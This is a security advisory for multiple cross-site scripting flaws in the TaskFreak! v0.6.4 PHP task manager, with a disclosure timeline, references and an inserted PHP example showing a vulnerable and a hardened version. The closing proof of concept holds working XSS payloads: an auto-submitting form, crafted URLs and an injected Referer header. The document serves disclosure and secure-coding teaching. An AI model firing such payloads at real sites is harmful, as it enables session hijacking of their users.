TaskFreak! v0.6.4 Multiple Cross-Site Scripting Vulnerabilities

2011-02-11T00:00:00
ID ZSL-2011-4990
Type zeroscience
Reporter Gjoko Krstic
Modified 2011-02-11T00:00:00

Description

Title: TaskFreak! v0.6.4 Multiple Cross-Site Scripting Vulnerabilities
Advisory ID: ZSL-2011-4990
Type: Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 11.02.2011

Summary

TaskFreak! Original is a simple but efficient web based task manager written in PHP.

Description

TaskFreak! suffers from multiple XSS vulnerabilities when parsing input to multiple parameters in different scripts. The vulnerable POST parameters are 'sContext', 'sort', 'dir' and 'show' through index.php. The GET parameters 'dir' and 'show' through print_list.php are also vulnerable, and the 'referer' request header is vulnerable through the rss.php script. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session.
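The advisory does not include TaskFreak's source, so the following is an added illustration rather than the project's own code: a hypothetical PHP fragment showing the pattern that produces the behaviour described above (request values reflected unescaped into HTML attributes, and a request header treated as trusted), next to a hardened equivalent that allow-lists the parameters with a fixed set of legal values and HTML-encodes everything else for the attribute context. The function names, the allow-list values and the sample input are assumptions constructed for this example.

```php
<?php
// Added illustrative example, not TaskFreak's own code. Function names,
// allowed values and sample input below are assumptions for illustration.
declare(strict_types=1);

// Vulnerable pattern (hypothetical): 'sort', 'dir' and 'show' are written
// straight into attribute values. A double quote in the value closes the
// attribute and whatever follows is parsed as markup by the browser.
function render_list_vulnerable(array $params): string
{
    $sort = $params['sort'] ?? 'date';
    $dir  = $params['dir']  ?? 'asc';
    $show = $params['show'] ?? 'all';
    return '<input type="hidden" name="sort" value="' . $sort . '" />'
         . '<input type="hidden" name="dir" value="'  . $dir  . '" />'
         . '<input type="hidden" name="show" value="' . $show . '" />';
}

// Hardened version. Parameters with a small, known set of legal values are
// checked against an allow-list (values assumed here) and fall back to a
// default; free text is encoded for the HTML attribute context with
// ENT_QUOTES so that both " and ' are neutralised.
const ALLOWED_SORT = ['date', 'priority', 'title', 'project'];
const ALLOWED_DIR  = ['asc', 'desc'];
const ALLOWED_SHOW = ['all', 'mine', 'done'];

function pick(string $value, array $allowed, string $default): string
{
    return in_array($value, $allowed, true) ? $value : $default;
}

function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_list_hardened(array $params): string
{
    $sort = pick((string)($params['sort'] ?? ''), ALLOWED_SORT, 'date');
    $dir  = pick((string)($params['dir']  ?? ''), ALLOWED_DIR,  'asc');
    $show = pick((string)($params['show'] ?? ''), ALLOWED_SHOW, 'all');
    // sContext is treated as free text here, so it is encoded, not allow-listed.
    $context = h((string)($params['sContext'] ?? ''));
    return '<input type="hidden" name="sort" value="' . h($sort) . '" />'
         . '<input type="hidden" name="dir" value="'  . h($dir)  . '" />'
         . '<input type="hidden" name="show" value="' . h($show) . '" />'
         . '<input type="hidden" name="sContext" value="' . $context . '" />';
}

// The rss.php case: a request header is untrusted input exactly like a
// parameter. If it is echoed as a link, restrict it to http(s) URLs and
// encode it for the attribute context; otherwise emit nothing.
function render_referer_link(array $server): string
{
    $ref    = (string)($server['HTTP_REFERER'] ?? '');
    $scheme = parse_url($ref, PHP_URL_SCHEME);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return '';
    }
    return '<a href="' . h($ref) . '">back</a>';
}

// Constructed input modelled on the advisory's PoC values (not real traffic).
$constructed = [
    'sort'     => '"><script>alert(1)</script>',
    'dir'      => '"><script>alert(2)</script>',
    'show'     => '"><script>alert(3)</script>',
    'sContext' => '" onmouseover=prompt(1) ',
];
$constructedServer = ['HTTP_REFERER' => '">Waddup!'];

echo "vulnerable:\n" . render_list_vulnerable($constructed) . "\n\n";
echo "hardened:\n" . render_list_hardened($constructed) . "\n";
echo "referer link: [" . render_referer_link($constructedServer) . "]\n";
```

Run with `php example.php`: the vulnerable output contains the raw `<script>` elements, while the hardened output reduces the three list parameters to their defaults, renders sContext with `&quot;` in place of the quote, and produces no link at all for the non-URL referer. The allow-list is the stronger control for parameters that only ever carry a handful of values; encoding remains necessary for anything that must be reflected verbatim.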

Vendor

Stan Ozier - <http://www.taskfreak.com>

Affected Version

0.6.4 (multi-user)

Tested On

MS Windows XP Pro SP3-EN, XAMPP (latest)

Vendor Status

[27.01.2011] Vulnerability discovered.
[31.01.2011] Tried contacting vendor through their forums.
[01.02.2011] 3rd party offered to review vulnerability details and offered patching.
[10.02.2011] No response from vendor.
[11.02.2011] Public advisory released.

PoC

taskfreak_xss.txt

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
High five to Borg

References

[1] <git://borg.uu3.net/OEM/taskfreak.git>
[2] <http://packetstormsecurity.org/files/98426>
[3] <http://www.exploit-db.com/exploits/16158>
[4] <http://securityreason.com/wlb_show/WLB-2011020047>
[5] <http://www.securityfocus.com/bid/46350>
[6] <http://secunia.com/advisories/43318/>
[7] <http://www.securityhome.eu/exploits/exploit.php?eid=9581802394d561484427503.77666550>
[8] <http://xforce.iss.net/xforce/xfdb/65359>
[9] <http://osvdb.org/show/osvdb/70877>
[10] <http://osvdb.org/show/osvdb/70878>
[11] <http://osvdb.org/show/osvdb/70932>
[12] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-1062>

Changelog

[11.02.2011] - Initial release
[12.02.2011] - Added reference [2], [3] and [4]
[14.02.2011] - Added reference [5], [6] and [7]
[15.02.2011] - Added reference [8]
[17.02.2011] - Added reference [9] and [10]
[25.02.2011] - Added reference [11] and [12]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

################################################################

TaskFreak! v0.6.4 Multiple Cross-Site Scripting Vulnerabilities


Vendor: Stan Ozier
Product web page: http://www.taskfreak.com
Affected version: 0.6.4 (multi-user)

Summary: TaskFreak! Original is a simple but efficient web based
task manager written in PHP.

Desc: TaskFreak! suffers from multiple XSS vulnerabilities when parsing
input to multiple parameters in different scripts. The vulnerable POST
parameters are: 'sContext', 'sort', 'dir' and 'show' through index.php. Also
the GET parameters 'dir' and 'show' through 'print_list.php' are vulnerable.
Header variable 'referer' is vulnerable through the rss.php script. Attackers
can exploit these weaknesses to execute arbitrary HTML and script code in
a user's browser session.

Tested on: MS Windows XP Pro SP3-EN, XAMPP (latest)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2011-4990
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4990.php


27.01.2011

################################################################


<script type="text/javascript">function xss(){document.forms["zappa"].submit();}</script>
<form name="zappa" action="http://taskfreak/index.php" method="POST" id="zappa">
    <input type="hidden" name="sProject" value="0" />
    <input type="hidden" name="id" value="" />
    <input type="hidden" name="mode" value="save" />
    <input type="hidden" name="sContext" value='%22%20onmouseover%3dprompt(/_did_you_smiled_today_?/)%20' />
    <input type="hidden" name="sort" value='"><script>alert(1)</script>' />
    <input type="hidden" name="dir" value='"><script>alert(2)</script>' />
    <input type="hidden" name="show" value='"><script>alert(3)</script>' />
</form>
<a href="javascript: xss();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit!</h3></center></font></b></a>

---

http://taskfreak/print_list.php?dir=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://taskfreak/print_list.php?show=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

---

GET /taskfreak/rss.php HTTP/1.1
Referer: ">Waddup!
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*